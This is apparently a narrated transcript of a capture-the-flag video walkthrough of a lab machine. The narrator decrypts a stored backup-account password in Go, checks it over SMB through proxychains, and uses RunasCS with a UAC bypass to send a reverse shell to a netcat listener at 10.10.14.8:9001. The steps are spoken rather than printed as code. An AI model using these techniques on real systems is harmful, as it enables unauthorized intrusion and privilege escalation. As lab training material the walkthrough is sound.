Let's just do blob, then error is equal to base64 dot URL encoding decode string b64 blob, right? Because this is base64 encoded. It's URL as indicated by underscore and dash, right? If it was slashes, we know it would be regular base64. And is that not the base64 decode? Let's see, is base64 imported? It is not. Let's gen blob, gen key. How do I do this? I could swear if error is equal nil. What are you complaining about? Undeclared name, base64. Is it like encoding base64 like that? Does that fix it? See, URL encoding, decode string. There we go. Okay. Now that that's fixed, I probably had a typo somewhere and that just screwed with everything. So we want to create the cipher. So AES, new cipher, nope. New cipher on key. If for some reason we errored, do that. Let's make the length of that. So I'm going to call this PlainText. And we also have to create the IV. which is going to be blob, AES block size, and then blob is equal to that. We make the plain text, and now what we have to do is decrypt it. So let's do stream XOR keystream plain text blob. And we need stream cipher new CFB decryptor. And we give it the block IV. There we go. That looks fine. We'll see if it decrypts. So we have the key. Let's say PT is equal to decrypt key blob. Let's print this out and go run. There we go. And this should be the password for the backup user. So let's try this. Let's do proxy chains because port 445 is not open externally, right? But we can do proxy change and then NXC, SMB 10.10.11.240-U backup-P, this password. And it's going to connect. And we see it is a valid password. We can put a invalid password in just to make sure it's not going to say everything is valid. So there we have it. But the box is not pwned. I guess we don't have the ability to write to $C$ or CVol. I'm guessing that's because this is not a member of the domain. So it just doesn't allow writing from admin. Let's see, we could try like winrm. I did a comma there. We don't want to -- shares. Let's see. I guess that port is not even open. We don't have a shell. Is RDP a thing? I guess we could have nc-zv to check, but it doesn't look like RDP is open. So now we're kind of stuck. We have this backup user, but we can't access anything with it. So our best bet is to get another shell here. So nc-lvnp 9001. Let's go back to Burp Suite, go to repeater, and we're going to have to disable the proxy. So we can hit this. We get the new shell here. And I forgot to RL wrap it. There we go. That just gives me the up and down arrows again, right? So let's see. Can I go in my exfil directory? Does this still work? It does not. I was hoping I could just copy over like RunasCS or something. Trying to think. I guess one PowerShell. Now let's use RunasCS. RunasCS. And let's go to downloads and download the zip. And hopefully this gives us a executable. I think it does. We can go back to our SMB directory. Let's just create a pane here. And let's copy downloads, RunasCS, unzip. Okay, so we have runascs.exe, and we have to download it. Let's see. Let's copy this new PS drive and mount it again. We'll call this share, because I don't think I can reuse the same name. Okay. Copy RunasCS.exe. Let's do C:\program data. We could probably just run it off the share if we really wanted to. I just like copying it to program data. CDC. Program data. I don't have RunasCS. CD. What did I just call this? Share. Why is it only showing .env? Was it case sensitive? Does that exist? It does. Let's just run it off of this. So do RunasCS. What are the arguments? Let's choose who am I all, and then once we verify it works, we'll try setting the reverse shell. So let's do backup, and then this password actually changes every 5 minutes. So we probably need to grab it again. We also have to set burp suite to use the socks proxy again. Connect to Elastic. There we go. And then I'm just going to copy this who am I all and see if we get output of backup. I expected to. Okay, we did. It just took its time, but we have backup. And we can see all the groups he is, and it is a member of administrators. So we just have to get a shell. So I'm going to try doing the -r. Was it, let's see, -r, then 10, 10, 14, 8, 9001. Run it again. If this does not work, I'd probably try getting another password just in case that 5-minute window hit between those two commands. It's probably taking a while to run because it's going over the SMB mount and it has to pull the entire binary every time it runs. That's why I was trying to copy it to program data because it would just go a little bit quicker. Not enough arguments. 3 required. What? I'm going to copy RunasCS.exe, program data. Let's go C:. This will just speed up the process. Let's see, RunasCS backup -r. Let's see, user1, where is it? User1 password, oh, cmd.exe. So we send cmd.exe to us. Wants us to use, let's just see. We're denied. It was telling us, what is it? Use bypass UAC. And logon type is equal to 8. Try this. WSA connect failed. I bet the password changed there. That looks different. Grab it. We have now about 5 minutes. Paste in. I don't see it complaining about UAC, so maybe we have a better token this time. Yep, we can get into the administrators directory. And that'll be the box. So hope you guys enjoyed it. Take care, and I'll see you all next time.